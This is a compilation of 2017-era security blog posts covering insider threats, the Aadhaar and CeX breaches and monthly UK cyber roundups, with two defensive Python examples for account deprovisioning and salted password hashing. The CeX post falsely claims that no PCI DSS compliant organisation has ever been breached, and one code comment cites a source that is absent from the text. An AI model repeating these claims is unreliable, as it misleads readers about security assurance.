All employees require knowledge or access to empower them to do their work. However, it’s noteworthy that ‘too many users with excessive access privileges’ was identified as an enabling risk factor. Clearly, policies that limit access should be in place and implemented to minimize insider threat risk, whether malicious or accidental. Employee education, combined with guidelines and policies for recognizing and monitoring a rogue/disgruntled employee, is necessary for security threat management. When the employment termination process begins, clear procedures to promptly remove access to corporate applications are vital. This article by the CERT Division of the Software Engineering Institute (SEI) provides a list of 19 best practices that can help mitigate the risk of IP theft, IT sabotage, and fraud posed by a disgruntled or ex-employee. It’s true that you can never reduce your risk of an insider threat to zero. However, by recognizing and responding to the risk through preparation and education, it can be minimized.
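One way to catch the deprovisioning failure described above is a scheduled reconciliation that joins the HR terminations feed against each application's account export and flags departed users whose accounts are still enabled, or who authenticated after their termination timestamp (the pattern in the Georgia-Pacific case). This is an added example written for this page, not code from the article or any source it cites; the CSV layouts, user ids, timestamps and the fixed "now" are all constructed.

```python
import csv
import io
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample inputs (hypothetical column names, no real people or systems).
HR_TERMINATIONS_CSV = """user_id,terminated_at
u1001,2014-02-14T17:00:00
u1002,2014-02-20T12:00:00
"""

ACCESS_EXPORT_CSV = """user_id,app,enabled,last_login
u1001,vpn,true,2014-02-16T02:13:00
u1001,plant-control-console,true,2014-02-15T23:40:00
u1002,email,true,
u1002,payroll,false,2014-02-10T08:00:00
u1003,email,true,2014-02-19T09:00:00
"""

# Fixed clock so the run is reproducible; a scheduled job would use datetime.utcnow().
NOW = datetime(2014, 2, 21, 0, 0, 0)
# How long an enabled account is tolerated after termination before it counts as overdue.
GRACE = timedelta(hours=24)


@dataclass(frozen=True)
class Finding:
    user_id: str
    app: str
    severity: str  # "critical", "high" or "low"
    issue: str


def parse_terminations(text: str) -> Dict[str, datetime]:
    """Map user_id -> termination timestamp from the HR feed."""
    return {
        row["user_id"]: datetime.fromisoformat(row["terminated_at"])
        for row in csv.DictReader(io.StringIO(text))
    }


def parse_access(text: str) -> List[dict]:
    """Normalise the application export: booleans and optional last-login timestamps."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        last_login: Optional[datetime] = (
            datetime.fromisoformat(row["last_login"]) if row["last_login"] else None
        )
        rows.append({
            "user_id": row["user_id"],
            "app": row["app"],
            "enabled": row["enabled"].strip().lower() == "true",
            "last_login": last_login,
        })
    return rows


def reconcile(terminations: Dict[str, datetime], access: List[dict],
              now: datetime = NOW, grace: timedelta = GRACE) -> List[Finding]:
    """Return one finding per (user, app) problem for terminated users only."""
    findings: List[Finding] = []
    for acct in access:
        term_at = terminations.get(acct["user_id"])
        if term_at is None:
            continue  # current employee: out of scope for this check
        # Authentication after the termination timestamp is the strongest signal:
        # the account was not only left enabled, it was actually used.
        if acct["last_login"] is not None and acct["last_login"] > term_at:
            findings.append(Finding(acct["user_id"], acct["app"], "critical",
                                    "login after termination"))
        if acct["enabled"]:
            overdue = now - term_at > grace
            findings.append(Finding(
                acct["user_id"], acct["app"],
                "high" if overdue else "low",
                "account still enabled " + ("past grace period" if overdue else "within grace period"),
            ))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity, for a dashboard or alert threshold."""
    counts = {"critical": 0, "high": 0, "low": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


if __name__ == "__main__":
    results = reconcile(parse_terminations(HR_TERMINATIONS_CSV), parse_access(ACCESS_EXPORT_CSV))
    for f in sorted(results, key=lambda f: (f.severity, f.user_id, f.app)):
        print(f"{f.severity:8} {f.user_id:6} {f.app:22} {f.issue}")
    print(summarize(results))
```

Feeding the same check a disabled-accounts list from the directory alongside each application export catches the common case where the directory account was disabled but an application with its own local credentials (VPN, payroll, control consoles) was missed.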

“By failing to prepare, you are preparing to fail.”  – Benjamin Franklin 

Sources: 

https://www.ca.com/content/dam/ca/us/files/ebook/insider-threat-report.pdf 

https://www.social-engineer.org/framework/general-discussion/categories-social-engineers/disgruntled-employees/ 

https://www.judiciary.gov.uk/wp-content/uploads/2017/12/morrisons_approved_judgment.pdf 

https://www.justice.gov/usao-mdla/pr/former-systems-administrator-sentenced-prison-hacking-industrial-facility-computer 

https://www.onelogin.com/press-center/press-releases/new-research-from-onelogin-finds-over-50-of-ex-employees-still-have-access-to-corporate-applications 

https://www.cert.org/insider-threat/best-practices/ 

The post Insider Threats – Recognize and Respond to the Risk Within appeared first on Security Through Education.

India’s Biometric Database Reportedly Breached, More Than One Billion Compromised

Between Equifax and Uber, there’s been a plethora of massive data breaches lately. These breaches not only compromise personal data, but they’re also leaving those impacted concerned about potential identity theft as a result. Now, India is faced with their largest data breach yet – as their governmental database Aadhaar has reportedly been compromised, which could affect the personal data of practically all of its 1.3 billion citizens.

How did this happen, exactly? Let’s start back in 2010 when, according to Buzzfeed, India started scanning personal details like names, addresses, dates of birth, mobile numbers, and more, along with all 10 fingerprints and iris scans of its 1.3 billion citizens, into a centralized government database called Aadhaar to create a voluntary identity system.

Fast forward to the present day, and all of this crucial data was simply handed over to the Tribune newspaper for a whopping $8. The publication said its reporters were able to access names, email addresses, phone numbers and postal codes simply by paying an individual $8, who provided them access to the database. What’s more, for another $5 the same individual offered the reporters unique identification cards (called Aadhaar cards) that can be used to access various government services. The individual responsible for the leak is apparently part of a larger group that was able to access the giant database through former Aadhaar workers.

Mind you, there’s still a lot of speculation and questions around this massive leak with the government authority that oversees the database claiming that the data is “fully safe and secure.” However, one thing is for sure, the entire country’s population needs to be on alert for their personal data becoming compromised, or even potential identity theft.

So, what can these citizens do to ensure their personal information stays secure? Start with these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are also good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers have been focused on staying protected against identity theft. That’s why, just this week, McAfee announced a solution that aids with exactly that. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post India’s Biometric Database Reportedly Breached, More Than One Billion Compromised appeared first on McAfee Blogs.

Cyber Security Roundup for December 2017

UK supermarket giant Morrisons lost a landmark data breach court case in December. After a disgruntled Morrisons employee had stolen and posted the personal records of 100,000 co-workers online, the supermarket chain was held liable for the data breach by the UK High Court. The High Court ruling now allows those affected to claim compensation for the "upset and distress" caused. Morrisons said it believed it should not have been held responsible and would be appealing against the decision. If the appeal is lost, it could open up the possibility of further class action lawsuits by individuals. Pending the GDPR becoming law in May 2018, such a court ruling sets a legal precedent for individuals to claim damages through the courts after personal data losses by companies. After May 2018, the GDPR grants individuals the right to sue companies for damages following personal data breaches. So we can expect 'ambulance chaser' lawyers to pick up on this aspect of the GDPR, with class action lawsuits following data breaches; it could well become the new "P.P.I. industry".

Any businesses or individuals using Kaspersky should be aware the UK National Cyber Security Centre has warned government agencies against using the Russian supplier’s products and services, which follows a ban by US government departments in November. Barclays responded to the warning by stopping its free offering of Kaspersky anti-virus products to its customers. 2017 saw cyber security become a political football, so it is no real surprise that the UK and US once again blamed North Korea for the devastating WannaCry attacks earlier in the year; personally, I blame poor patch management and hackers, not the North Korea cyber army!

Nadine Dorries MP got herself in hot water after trying to defend now former political colleague Damian Green, following claims that Mr. Green accessed porn on his Parliament computer. This activity was reported by a retired police officer, which was said to be a breach of the Data Protection Act. Nadine tweeted "my staff log onto my computer on my desk with my login everyday" to suggest anyone could have used Damian Green's PC to access the illicit websites. This led to widespread condemnation and a warning by the ICO to MPs on password sharing.

The fact that illicit websites were not blocked by Parliament systems is one concerning security issue, but the flagrant disregard for basic cybersecurity by government MPs is gobsmacking, especially when you consider they are supposed to understand the risk and set laws to protect UK citizens from cyber attacks and data breaches. It's another "slap palm on head" moment after the last UK Prime Minister announced he wanted to ban encryption.

2017 has seen huge rises in cryptocurrency values, which has placed cryptocurrency brokers and users' crypto coin wallets in the sights of cybercriminals. This month mining platform NiceHash was breached by hackers, who stole £51 million worth of Bitcoin, and Bitcoin exchange Youbit, which lets people buy and sell Bitcoins and other virtual currencies, shut down and filed for bankruptcy after losing 17% of its assets in the cyber-attacks. I think we can expect further cryptocurrency attacks in 2018 given the cryptocurrency bubble is yet to burst.

Faked LinkedIn profiles are nothing new; however, the German Intelligence Agency (BfV) said it had spotted China using faked LinkedIn profiles to connect with and gather information on German officials and politicians, which is an interesting development.

Finally, hackers were reported as taking advantage of poorly secured systems at UK private schools, and it was claimed hackers could turn off heating systems at UK schools and military bases.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

The Year Cybersecurity Made Primetime

Grey-Sloan Memorial Hospital, the fictional hospital on the television drama “Grey’s Anatomy,” was suddenly brought to a halt Nov. 14 at the hands of ransomware. The No. 3 drama on broadcast television, a venerable franchise of 14 seasons and 300 episodes, reflected the harsh reality faced by many. WannaCry, Petya, and Equifax entered dinner table conversation and late-night talk show monologues. In 2017 cybercrime made primetime.

Shonda Rhimes, creator of “Grey’s Anatomy,” tweets about the ransomware attack on Grey-Sloan Memorial

The events that transpired this year put cybersecurity on everyone’s mind. The stories of ransomware and malware found their way into homes, schools, and businesses – everyday life.

The Attacks That Changed Everything

In May, the ransomware WannaCry took center stage. True to its name, WannaCry was worth its weight in tears: 150 countries impacted, 250,000 machines infected, 16 United Kingdom medical centers taken down, all in just one day. The ransom was paid, and expert analysis ensued. The motive: disruption. As Raj Samani, Chief Scientist at McAfee stated: “The game has changed. The reality is that any organization can hire someone to disrupt a competitor’s business operations for less than the price of a cup of coffee.”

Taking cues from WannaCry, the Petya/NotPetya malware emerged a month later as its successor. The next global cyberattack leveraged the same vulnerability, but was nastier when infecting systems. Instead of locking away files and extorting money from victims, Petya/NotPetya was a wiper – deleting all files from affected devices.

The threat landscape was not just populated by cyberattacks, but also a data breach deemed the worst in recent memory. The Equifax breach exposed crucial personal identification of roughly 143 million consumers in the United States. This data included names, addresses, birthdates, driver’s license data and Social Security numbers. “We need to view the Equifax breach as a catalyst moment for rethinking the way we handle identification for U.S. citizens,” said Steve Grobman, senior vice president and chief technology officer for McAfee.

Rethink we did. These attacks, and other notable ones such as Bad Rabbit, the Uber data breach, the KRACK Wi-Fi attack, and more, changed how the cybersecurity industry responds to threats.

Cause and Effect

These attacks moved the needle. Cybercriminals were upping their game. These attacks mandated that cybersecurity must be faster, smarter, and more effective. Christiaan Beek, lead scientist and principal engineer at McAfee, says our improved response time to ransomware attacks confirms that’s happening: “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.”

Looking Ahead

Now that cybersecurity is on prime time, what happens? We’re paying attention. Does that mean we’re prepared?

McAfee Chief Executive Officer Chris Young thinks we still have a ways to go. “It’s nearly 2018. And from the discussions I have weekly, it’s clear that business leaders understand far more about the risk of cyber threats today than they did even a few years ago. However, so many business leaders I talk to still want to know if they’re doing everything they can to protect their companies. Answer: They’re not.”

Young recommends a “Culture of Security”: a paradigm shift in philosophy and approach from the executive boardroom to new employees on their first day. Leaders must demonstrate a new priority, whether it’s impeccable password and virtual private network use, or cloud computing adoption only under the guidance of cybersecurity professionals. “Businesses need to think security first,” Young says. “Whether that’s in designing new products and services, signing partnership agreements, in hiring new employees, or anything else.”

Malware is not the star of the show. It’s the villain, but a powerful one. Cybersecurity must adapt to address it. McAfee wrapped up 2017 by announcing the upcoming acquisition of cloud provider Skyhigh Networks, which will become part of the McAfee Cloud Security Business Unit. Skyhigh will join a McAfee portfolio that includes market-leading products in the endpoint and security operations center (SOC). Partnering in an open ecosystem pulls these major strengths together in a new and agile way.

Welcome, 2018. New tools and a new “Culture of Security” are ready to take on new threats.

The post The Year Cybersecurity Made Primetime appeared first on McAfee Blogs.

What Leakbase Going Dark Means for the Data Breach Lifecycle

“Big Company Hit with Data Breach, Millions of Users Impacted.” An all too familiar news title, for an all too familiar issue. It almost seems that each week we read about a new data breach in the news. We learn how it happened, what the hackers went after, and the ramifications. Those affected scan their credit, potentially chopping up compromised cards. But what happens after that?

A data breach is just that – data that has been breached. After they’ve attacked an organization, hackers have barrels of stolen information just sitting on their laptops. So, the next question for black hats is often – what do we do with this stolen data? Answer: turn it into profit.

That’s where sites like Leakbase come into play. These crooks can hand over this stolen data to Leakbase, a website that has indexed and sold access to billions of usernames and passwords swiped in some of the world’s largest data breaches. Leakbase began its operations in late 2016, advertising access to crucial data stolen from data breaches involving LinkedIn, Myspace, and Dropbox. That is, until this week, when the site suddenly went dark, discontinuing its service entirely. In fact, after being discontinued, the domain was redirected to Troy Hunt’s https://haveibeenpwned.com/ site, which actually allows anyone to check whether specific email addresses have been involved in a data breach. There’s speculation that Dutch law enforcement has been involved in this shutdown, but as of now it remains only that – speculation.

So, even though Leakbase is gone, the existence of the site and others like it serves as an important reminder that the impact of data breaches reverberates louder and longer than we may imagine. “Warehouses of stolen data extend the risk of breaches,” says Christiaan Beek, lead scientist and principal engineer at McAfee, who helped identify this trend in cybercrime in a 2017 Threats Predictions report.

Beek says the same thing goes for cloud data services, which can be mined for valuable information while also allowing criminals to change and hide their own identities. “The same cloud capabilities that help businesses can also house stolen data and help bad guys constantly cycle through their own information, making them harder to track.” Beek says this brings home the need for evolving security operations centers connected to a community. “If it’s you vs. them, it’s very hard. If it’s all of us vs. them, we have much better odds.”

To learn more about Leakbase and the ramifications of data breaches, be sure to follow us at @McAfee and @McAfee_Labs.

The post What Leakbase Going Dark Means for the Data Breach Lifecycle appeared first on McAfee Blogs.

Cyber Security Roundup for November 2017

One of the most notable data breaches disclosed this month was by Uber, given the company attempted to cover up the breach by paying off hackers. Over a year ago the transport tech firm was said to have paid £75,000 to two hackers to delete 57 million Uber account records which they had stolen. Uber revealed around 2.7 million of the stolen records were British riders and drivers. As a UK Uber rider, this could mean me; I haven't received any notification of the data breach from Uber as yet. The stolen information included names, email addresses, and phone numbers. Uber can expect enforcement action from regulators on both sides of the pond; the UK Information Commissioner's Office (ICO) said it had "huge concerns" about the breach and was investigating.

Jewson, Cash Converters, and Imgur all reported losing data due to hacks this month, while Equifax has reported suffering significant negative financial losses following their high profile hack of personal customer data. Equifax reported their net income had dropped by £20 million due to the hack, and their breach bill was coming in at a whopping £67 million.

November was a very busy month for security patch releases, with Microsoft, Apple, Adobe, Oracle, Cisco and Intel releasing a raft of patches to fix critical vulnerabilities. Apple even had to quickly release an emergency patch at the end of November to fix a root access flaw reported in macOS High Sierra version 10.13.1. So just keep patching everything in IT to ensure you and your business stay ahead of enterprising cybercriminals; the Equifax breach is a prime example of what can go wrong if system patching is neglected.

November also saw the Open Web Application Security Project (OWASP) finally release an updated version of its Top Ten application vulnerabilities list, which is a ‘must know’ secure coding best practice for all software developers and security testers, especially considering that Akamai reported web application attacks had increased by 69% in the third quarter of 2017. Look out for updated OWASP Top Ten IBM DeveloperWorks guidance from me in December to reflect the updated list.


Cyber Security Roundup for October 2017

State-orchestrated cyber attacks have dominated the media headlines in October, with rogue state North Korea and its alleged 6,800-strong cyber force blamed for several cyber attacks. International intelligence scholars believe the North Korean leadership is using cyber warfare to up the political ante in its ongoing dispute with the United States. The North Koreans, as well as terrible security practices, were directly blamed by the UK National Audit Office for the recent NHS WannaCry attack (despite North Korea denying it). North Korea was also reported to be implicated in the theft of US war plans from South Korea, and in a spear phishing campaign against the US power grid. The possible Russian manipulation of the US election with cyber attacks and rogue social media campaigns is still a story not going away, while the Chinese are alleged to be behind the data theft relating to the Australian F-35 fighter jet, in what is described as an 'extensive' cyberattack. The finger was pointed at Iran for the recent Parliamentary email cyber attacks in the UK; meanwhile, EU governments vented their cyber concerns, warning that cyber attacks can be an act of war.

Stephen Hawking caused controversy in both the science and tech industries last year when he said Artificial Intelligence could be a serious threat to human existence; could the plot of The Terminator really come to fruition? Perhaps so, as it was reported that AI had already defeated the Captcha security check system. Personally, I believe both AI and Quantum Computing will pose significant new threats to the cybersecurity space in the next decade.

A far higher number of personal records were compromised in the Equifax data breach than was previously thought, with millions of UK citizens confirmed to be impacted by the US-based credit checking agency hack. Equifax’s now ex-CEO provided an interesting blow-by-blow account of the cyber-attack at a US government hearing: even though Equifax technical staff were specifically warned about a critical Apache Struts (web server) patch, it was ignored and not applied, which in turn allowed hackers to take full advantage of the vulnerability to steal the Equifax data en masse. To make matters even worse, the Equifax consumer breach help website was found to be infecting visitors with spyware.

Yahoo revealed all 3 billion of its user accounts had in fact been breached, in what is truly an astonishing mammoth-sized hack, the biggest in all history, so far. Elsewhere on the commercial hacking front, Pizza Hut's website was reported to be hacked with customer financial information taken, and Disqus said a 2012 breach it discovered in October exposed the information of 17.5 million of its users from as far back as 2007.

It was a super busy month for security vulnerability notifications and patch releases, with Microsoft, Netgear, Oracle, Google, and Apple all releasing rafts of critical level patches. A serious weakness in the wireless networking WPA2 protocol was made public to great fanfare after researchers suggested all Wifi devices using WPA2 on the planet were vulnerable to an attack called Krack, which exploited the WPA2 weakness. Krack is a man-in-the-middle attack which allows an attacker to eavesdrop or redirect users to fake websites over Wifi networks secured using the WPA2 protocol. At the time of writing most wireless access point vendors and operating system providers had released patches to close the WPA2 vulnerability, and there have been no known exploits of the vulnerability reported in the wild.

BadRabbit is a new strain of ransomware which is emerging and is reported to be infecting systems and networks in Russia and Ukraine at the moment. BadRabbit is the latest network self-propagating malware, like NotPetya and WannaCry, to use the NSA EternalRomance hacking tool. A massive new IoT botnet was discovered; its continued growth is fuelled by malware said to be more sophisticated than the previous IoT botnet king, Mirai. Russian-based threat actor group APT28 is said to be exploiting a recently patched Adobe vulnerability (CVE-2017-11292) using malicious Microsoft Word attachments, so ensure you keep on top of your system patching and always be careful when opening email attachments.

Finally, the UK National Cyber Security Centre (NCSC) released its first annual report, as it seeks to improve cybersecurity across the UK. Among NCSC achievements cited in the report are:
  • The launch of Active Cyber Defence, credited with reducing average time a phishing site is online from 27 hours to 1 hour
  • Led UK response to WannaCry
  • Advice website with up to 100,000 visitors per month
  • Three-day Cyber UK Conference in Liverpool
  • 43% increase in visits to the Cyber Security Information Sharing Partnership (CiSP)
  • Produced 200,000 physical items for 190 customer departments via UK Key Production authority to secure and protect communications of Armed Forces and national security
  • 1,000 youngsters on CyberFirst courses and 8,000 young women on CyberFirst Girls competition.
  • Worked with 50 countries, including signing Nato's MoU

Cyber Security Roundup for September 2017

A massive data breach at Equifax dominated the UK media finance headlines this month, after 143 million customer records were compromised by a cyber-attack, 400,000 of which were UK customer accounts. Hackers took advantage of Equifax’s negligence in not applying security updates to servers. The data breach has already cost the CEO, CIO and CISO their jobs. In the UK Equifax faces investigations and the prospect of significant fines by both the Financial Conduct Authority and the Information Commissioner's Office over the loss of UK customer financial and personal data respectively.

Hackers stole a quarter of a million Deloitte client emails; following the breach, Deloitte was criticised by security professionals for not adopting two-factor authentication to protect the email data which they hosted in Microsoft’s Azure cloud service.

September was an extremely busy month for security updates, with major patch releases by Microsoft, Adobe, Apache, Cisco and Apple to fix an array of serious security vulnerabilities including BlueBorne, a Bluetooth bug which exposes billions of devices to man-in-the-middle attacks.

UK government suppliers using Kaspersky to secure their servers and endpoints may well be feeling a bit nervous about the security software after Kaspersky was banned by US government agencies. The US Senate accused the 20-year-old Russian-based security company of being a pawn of the Kremlin and posing a national security risk. Given the close ties between US and UK intelligence agencies, there are real fears it could lead to a similar ban in the UK as well. A UK ban could, in theory, be quickly extended to UK government suppliers through the Cyber Essentials scheme, given Cyber Essentials accreditation is required of all UK government suppliers.

While on the subject of Russia, the English FA has increased its cybersecurity posture ahead of next year's World Cup, likely due to concerns about the Russian Bears hacking group. The hacking group has already targeted a number of sports agencies in recent months, including hacking and releasing football players' World Cup doping reports last month.

In the last couple of weeks, I was interviewed for Science of Security, and I updated my IBM Developer Works article on Combating IoT Cyber Threats.


Science of CyberSecurity: Latest Cyber Security Threats

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 5 of 5.

Q. What keeps you up at night in the context of the cyber environment that the world finds itself in?
The growing dependence on and integration of connected computers within our daily lives means we are embarking on an era where cyber attacks will endanger our lives. Networked and complex IT systems are inherently insecure, meaning it is open season for nation-states, cyber terrorists and the curious to attack these life-integrated emerging technologies, from driverless cars to countless new home IoT devices. I fear it will only be a matter of time before a cyber attack causes human harm or even loss of life. The impact of the recent NHS ransomware attack serves as a warning; this cyber attack directly caused the closure of accident and emergency departments and the cancellation of operations. The future threats posed by artificial intelligence and quantum computing are also growing concerns for cyber security, and well worth keeping an eye on as these technologies continue to progress.

Science of CyberSecurity: Reasons Behind Most Security Breaches

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 2 of 5.

Q. What – in your estimation – are the reasons behind the many computer security breaches/failures that we see today?
Simply put, insecure IT systems and people are behind every breach. Insecure IT systems are arguably caused by people as well; whether it is poor system management, lack of security design, insecure coding techniques, and/or inadequate support, it all boils down to someone not doing security right. For many years seasoned security experts have advocated that people are the weakest link in security, and even hackers say ‘amateurs hack systems, professionals hack people’, yet many organisations still focus most of their resources and funds heavily on securing IT systems over providing staff with sustained security awareness. Maybe this is a result of an IT security sales industry over-hyping the effectiveness of technical security solutions. I think most organisations can do more to address this balance, starting with better understanding the awareness level and risk posed by their employees. For instance, the security awareness of staff can be measured by using a fake phishing campaign to detect how many staff would click on a link within a suspicious email, while analysing the root causes of past cyber security incidents is a highly valuable barometer in understanding the risk posed by staff; all of this can be used as inputs into the cyber risk assessment process.

Cyber Security Roundup for August 2017

TalkTalk yet again made all the wrong cyber security headlines in the UK this month, after it was handed a £100,000 fine by the Information Commissioner's Office (ICO) for not adequately protecting customer records from misuse by its staff. The ICO investigated the Internet Service Provider after receiving complaints from customers, who said they received cold calls from scammers who knew their TalkTalk account information.

Second-hand goods firm CeX disclosed a compromise of up to 2 million online customer accounts due to a hack, however, CeX has yet to disclose any details about the cyber attack. My blog post and advice about this is here http://blog.itsecurityexpert.co.uk/2017/08/up-to-2-million-cex-customer-account.html

Hackers had a field day taking over social media accounts, from Real Madrid and FC Barcelona to Game of Thrones, much embarrassment could have been avoided if they had adopted multi-factor authentication on the accounts, aside from the spate of Instagram hacks which were caused by the exploitation of a software vulnerability, namely within Instagram's API.

In what looks like a follow on from the UK's Parliament's email brute force email account attack in June, the Scottish Parliament was hit by a very similar cyber attack, it was reported, as per the Westminister attack, many SMPs were found to be using weak passwords. Let's hope the Welsh Assembly have taken note and have learned the password security lessons.

A massive 'spambot' holding 711 million email addresses was found by a security researcher to be spreading malware. It was said to have been put together using stolen data from previous LinkedIn and Badoo data breaches. Using legitimate email addresses helps in the avoidance of anti-phishing and spam filters.

On the ransomware front, LG reported WannaCry caused a two-day shutdown of its business in South Korea. TNT customers were said to be furious after NotPetya badly affected its ability to deliver hundreds of thousands of items, particularly in Ukraine. And Digital Shadows reported a trend of cyber criminals dropping exploit kits for ransomware, as there is simply a lot more money to be made from ransomware attacks.

On the critical security patching front, Microsoft released 25 patches, Adobe released 43, and Drupal patched a critical bug. And there was an interesting article posted by Microsoft on Cyber Resilience worth reading.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Up to 2 Million CeX Customer Accounts Compromised by Security Breach

If you are a CeX online customer, change your account password now, as the second-hand UK goods chain has been informing over two million of its customers that their personal details have been hacked. In a customer email CeX discloses they have been the subject of a security breach by a third party, and that's about as much detail as CeX are presently admitting about the cyber attack.

Despite the CeX email referring to a "sophisticated breach of security", without any further detail about what happened it is impossible to judge whether it was actually a sophisticated cyber attack or not. Rather oddly, CeX have not forced a password change on their compromised customer accounts despite admitting account passwords were at risk.

My CeX Customer Advice
  • Change your CeX password straight away. Ignore the CeX website's advice that a 6-character password is sufficient; that is too weak (see the Account Password section of this post below). Alternatively, you could also close your CeX account through the website.
  • If you have used your old CeX password on any other websites, change those account passwords quickly.
  • Be vigilant for personalised scam emails purporting to be from CeX, given cyber criminals might have your email address and know you are a CeX customer.
  • Review your credit card statements and bank statements for suspicious activity. Note CeX might have put your bank account details and Bitcoin address at risk.

Data Compromised
CeX have not been too clear in detailing the customer account data that is at risk, stating "The data includes some personal information such as first name, surname, addresses, email address and phone number if this was supplied" and "In a small number of instances, it may include encrypted data from expired credit and debit cards up to 2009. No further financial information has been shared."

Reviewing a CeX website account suggests the following customer account personal data is at risk:
  • Email Address
  • Bitcoin Address
  • Full Address
  • Bank Details - Account Holder Name, Sort Code, Account Number, Roll Number
  • Phone Number

It is concerning that CeX refer to storing debit/credit card details past their expiry dates - why? CeX also appear to be glossing over the significance of compromised customer debit/credit card details in stating "We would like to make it clear that any payment card information that may have been taken, has long since expired". That is a rather misleading statement, given some payment card issuers reuse the debit/credit card number when reissuing new cards, and the new expiry date is guessable. Given that statement, you have to wonder whether the CeX operation was secure enough to handle debit/credit card data: are CeX PCI DSS compliant? Payment Card Industry Data Security Standard compliance is required for all organisations which process, store and/or transmit debit/credit card details, and no PCI DSS compliant organisation has ever been successfully breached.

Account Password
CeX also states the account passwords were not stored in plain text, but has not advised how the passwords were protected. For instance, whether passwords were stored by combining a unique random value (salt) with the password before scrambling it with an industry recognised one-way hashing algorithm (adequate security protection), or by just applying the hashing algorithm to the password alone (inadequate security protection, since identical passwords produce identical hashes and precomputed tables can reverse them).
Change your CeX password

CeX recommends a 6-character or longer password in their website's password change process, which is too weak. CeX customers should avoid settling for that 6-character minimum and go for a password of at least 8 characters consisting of at least one number, one upper case character, one lower case character and one special character (i.e. #!"£$%^&). I recommend using a password manager (see advice on https://www.itsecurityexpert.co.uk) to generate a unique and secure random password of at least 12 characters to really be on the safe side.
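To make the two points above concrete (the salted, one-way password hashing described under Account Password, and the password strength advice in this section), here is an added Python example. It is illustrative code written for this post, not code from CeX or from this blog; the policy thresholds, the `pbkdf2_sha256$...` storage format, the iteration count and the user names and passwords are all constructed for the demonstration.

```python
import hashlib
import hmac
import os
import secrets
import string
from typing import List, Optional

# Constructed policy mirroring the post's advice: reject the 6-character minimum
# the CeX site allows, require 8+ characters with all four character classes,
# and treat 12+ random characters (password-manager style) as the safe choice.
MIN_LENGTH = 8
RECOMMENDED_LENGTH = 12
SPECIALS = '#!"£$%^&'   # the special characters the post lists


def check_password_policy(password: str) -> List[str]:
    """Return the list of policy failures; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c.isupper() for c in password):
        problems.append("no upper-case letter")
    if not any(c.islower() for c in password):
        problems.append("no lower-case letter")
    if not any(not c.isalnum() for c in password):
        problems.append("no special character")
    return problems


def generate_password(length: int = RECOMMENDED_LENGTH) -> str:
    """Generate a random password the way a password manager would (CSPRNG-backed)."""
    alphabet = string.ascii_letters + string.digits + SPECIALS
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if not check_password_policy(candidate):   # retry until all classes are present
            return candidate


def unsalted_hash(password: str) -> str:
    """Inadequate protection: a bare hash. Equal passwords give equal digests,
    so one precomputed table of common passwords reverses every user at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Iteration count is a constructed demo value; deployments should tune it upwards.
ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Adequate protection: per-user random salt plus a slow, standard one-way
    function (PBKDF2-HMAC-SHA256). Output is self-describing so it can be verified later."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                        bytes.fromhex(salt_hex), int(iterations))
    except ValueError:          # malformed record: wrong field count or bad hex/int
        return False
    return hmac.compare_digest(candidate.hex(), digest_hex)


def demo() -> dict:
    """Two constructed users who happen to share a password: unsalted hashes collide
    (leaking that fact to anyone holding the database), salted ones do not."""
    users = {"alice": "Summer2017!", "bob": "Summer2017!"}
    unsalted = {u: unsalted_hash(p) for u, p in users.items()}
    salted = {u: hash_password(p) for u, p in users.items()}
    return {
        "unsalted_collide": unsalted["alice"] == unsalted["bob"],
        "salted_collide": salted["alice"] == salted["bob"],
        "verify_ok": verify_password("Summer2017!", salted["alice"]),
        "verify_wrong_case": verify_password("summer2017!", salted["alice"]),
    }


if __name__ == "__main__":
    print("abc123 fails policy:", check_password_policy("abc123"))
    print("generated:", generate_password())
    print(demo())
```

The policy checker is what a site's password change form should enforce in place of a bare length minimum; the salted PBKDF2 record is the shape a breached database should be in so that, as the CeX Q&A itself notes, only a weak password can be recovered from the stolen hash within a useful time.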

By the way, CeX requires you to know your old password in order to change it, so you'll have to hope the hacker hasn't changed your password.

CeX also has a "Cancel Your Account" option which I assume will remove all personal data from CeX; customers could submit a Data Subject Access Request to CeX after account closure to be certain.

Breach Recovered and Fixed?
